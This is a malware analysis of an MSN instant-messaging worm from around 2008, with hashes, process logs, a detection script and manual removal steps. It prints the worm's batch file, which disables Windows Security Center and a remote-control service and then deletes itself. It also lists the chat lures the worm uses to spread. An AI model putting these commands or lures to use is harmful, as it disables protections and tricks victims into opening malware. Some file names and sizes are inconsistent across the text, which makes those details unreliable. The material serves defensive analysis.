Author: ZDNet Security Channel  Source: compiled from forum posts  June 20, 2008
Keywords: IMG34814.pif worm msn
File name: IMG34814.pif
File size: 141824 bytes
AV name: Trojan.Win32.Delf.ads (Kaspersky)
Packer: none
Language: Borland Delphi 6.0 - 7.0
Malware type: backdoor
File MD5: ef2e009208e0efef05d149ee06388dd3
File SHA1: 45E43FB7BD4EB62D524927F5BE71240A74C9BB6B
Propagation: MSN.
Behaviour analysis:
1. Drops the following files:
%Windir%\msnmsg.exe 41824 bytes
%Windir%\pic.zip 141946 bytes (archive)
%Windir% is C:\Winnt (2000, ME) or C:\Windows (XP, 2003)
2. Drops a batch file: c:\a.bat
Content:
@echo off
rem stop the Windows Security Center and the WinVNC4 remote-control service
net stop "Security Center"
net stop winvnc4
rem delete the batch file itself after it has run
del c:\a.bat
It launches CMD and calls Net Stop to try to disable the following services:
Security Center (Windows Security Center), winvnc4 (remote control)
SSM log:
Parent process:
Path: C:\WINNT\system32\CMD.EXE
PID: 1580
Information: Windows NT Command Processor (Microsoft Corporation)
Child process:
Path: C:\WINNT\system32\net.exe
Information: Net Command (Microsoft Corporation)
Command line:"C:\winnt\system32\net.exe" stop "Security Center"
Parent process:
Path: C:\WINNT\system32\CMD.EXE
PID: 1580
Information: Windows NT Command Processor (Microsoft Corporation)
Child process:
Path: C:\WINNT\system32\net.exe
Information: Net Command (Microsoft Corporation)
Command line:net stop winv.nc4
3. Attempts to start msnmsgr.exe without checking whether it exists or is already running
Log:
Parent process:
Path: C:\WINNT\system32\svchost.exe
PID: 404
Information: Generic Host Process for Win32 Services (Microsoft Corporation)
Child process:
Path: C:\Program Files\MSN Messenger\msnmsgr.exe
Information: MSN Messenger (Microsoft Corporation)
Command line:"C:\Program Files\MSN Messenger\msnmsgr.exe" -Embedding
4. The fake msnmsgr.exe (C:\Windows\msnmsgr.exe) stays resident as a process, connects to 213.232.92.1**, and opens port 1863.
(Quite convincing. Going by the IP it is probably an IRC server in the UK, but no other behaviour was observed.)
5. Monitors MSN chat windows and randomly sends one of the following messages together with the pic.zip archive:
Hey :-), I just took this picture, sexy isnt it :-P?
What do you think of my photo editing skills?
Which one do you like in this pic, the black one or the blue one?
This is what happens when you eat to many chips :-P
Look what i made out of cans!! haah :-P!
:-p this was halarious at that party a while back
Hey I have a new pic, what do ya think?
Check this out this pic is so freaking cool
Hahahaha, do you remember this picture?
:-O Check this out! Nearly laughed my ass off!!
hey wats up.. have you seen this pic of .harry potter?
(unverified)
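As an added detection example, not part of the original post, the script below parses records in the SSM log layout shown above and flags the two behaviours from steps 2 and 4: net stop of Security Center or winvnc4 spawned by cmd.exe, and msnmsg.exe/msnmsgr.exe running outside the MSN Messenger install directory. The sample log is constructed, and the genuine install path is assumed from the log in step 3.

```python
import re
# Constructed sample in the SSM log layout used above; not a real capture.
SAMPLE_LOG = r"""Parent process:
Path: C:\WINNT\system32\CMD.EXE
Child process:
Path: C:\WINNT\system32\net.exe
Command line:"C:\winnt\system32\net.exe" stop "Security Center"
Parent process:
Path: C:\WINNT\system32\svchost.exe
Child process:
Path: C:\Windows\msnmsgr.exe
Command line:"C:\Windows\msnmsgr.exe" -Embedding
Parent process:
Path: C:\WINNT\system32\svchost.exe
Child process:
Path: C:\Program Files\MSN Messenger\msnmsgr.exe
Command line:"C:\Program Files\MSN Messenger\msnmsgr.exe" -Embedding
"""

STOPPED_SERVICES = {"security center", "winvnc4"}   # targets of the dropped a.bat
LEGIT_MSN_DIR = r"c:\program files\msn messenger"   # assumed genuine install path
DROPPED_NAMES = (r"\msnmsg.exe", r"\msnmsgr.exe")   # names the worm uses

def parse_events(text):  # -> list of {'parent': {...}, 'child': {...}} records
    events, cur, side = [], None, None
    for line in text.splitlines():
        if line == "Parent process:":
            cur, side = {"parent": {}, "child": {}}, "parent"
            events.append(cur)
        elif line == "Child process:":
            side = "child"
        elif cur is not None and ":" in line:
            key, _, val = line.partition(":")
            cur[side][key.strip().lower()] = val.strip()
    return events

def flag_event(ev):  # reason string if the record matches worm behaviour, else None
    parent = ev["parent"].get("path", "").lower()
    child = ev["child"].get("path", "").lower()
    cmd = ev["child"].get("command line", "").lower()
    if child.endswith(r"\net.exe") and parent.endswith(r"\cmd.exe"):
        m = re.search(r'stop\s+"?([^"]+?)"?\s*$', cmd)
        if m and m.group(1) in STOPPED_SERVICES:
            return "cmd.exe -> net stop %r" % m.group(1)
    if child.endswith(DROPPED_NAMES) and not child.startswith(LEGIT_MSN_DIR):
        return "msnmsgr lookalike outside install dir: " + child
    return None

def scan(text):  # (record index, reason) for every flagged record
    return [(i, r) for i, ev in enumerate(parse_events(text)) if (r := flag_event(ev))]
```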
Removal:
First try a dedicated MSN worm removal tool and see whether it can clean it.
Manual removal:
Download SREng
http://www.kztechs.com/sreng/download.html
1. Disconnect from the network and close any processes you do not need.
2. Open Task Manager and end the msnmsgr.exe process (end every instance you find).
3. Open SREng and delete:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<Microsoft Genuine Logon><msnmsg.exe> []
4. Delete:
%Windir%\msnmsg.exe 41824 bytes (note the path)
%Windir%\pic.zip 141946 bytes (archive)
%Windir% is C:\Winnt (2000, ME) or C:\Windows (XP, 2003)
PS: If the msnmsgr.exe process cannot be ended, skip that step: clean the registry first, reboot, and then delete msnmsg.exe.